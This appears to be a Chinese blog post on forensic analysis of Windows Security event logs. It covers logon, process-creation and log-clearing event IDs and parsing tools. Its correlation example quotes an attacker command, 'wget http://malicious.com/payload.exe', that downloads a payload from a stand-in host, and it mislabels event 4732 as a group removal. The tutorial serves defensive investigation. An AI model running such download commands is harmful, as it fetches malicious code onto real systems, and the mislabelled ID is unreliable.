日志分析进阶——Windows安全日志

前面讲过Windows事件日志的框架,这篇深入讲安全日志——取证里最常用、价值最高的。

安全日志在C:\Windows\System32\winevt\Logs\Security.evtx。

必须记住的事件ID:

登录相关:

4624:登录成功。记录登录类型(2本地、3网络、10远程桌面)、用户名、源IP。

4625:登录失败。短时间大量出现→暴力破解。

4672:管理员登录。通常紧跟在4624后面。

4776:域控验证凭据(域环境用)。

进程创建:

4688:创建新进程。记录谁运行了什么程序、命令行参数。

权限变更:

4728/4732/4740:加入组/移除组/账户锁定。

分析实操步骤:

用EvtxECmd把.evtx解析成CSV,提取事件ID、时间、用户名、IP。

在Excel里打开,筛选出所有事件ID,统计分布——哪个ID特别多?

重点看4624和4625。找出所有登录失败的记录,有没有某个账户短时间大量失败?

追踪成功的登录记录(4624),看源IP是否可疑。

关联分析——可疑IP凌晨2点登录(4624),2点01分创建新进程(4688),运行wget http://malicious.com/payload.exe 。攻击者的操作就串起来了。

日志量太大:先做时间过滤,比如只看案发前后一天的数据。或者用Hayabusa,它内置检测规则,能自动标注“可疑”事件。

记住:安全日志被清空时会记录1102。如果日志有断档又没看到1102,可能是第三方工具清除了日志——这本身就是线索。104是系统日志或应用程序日志被清除时的ID,别搞混。日志默认UTC时间,注意时区。

posted @ 2026-08-31 20:44  skosm  阅读(0)  评论(0)    收藏  举报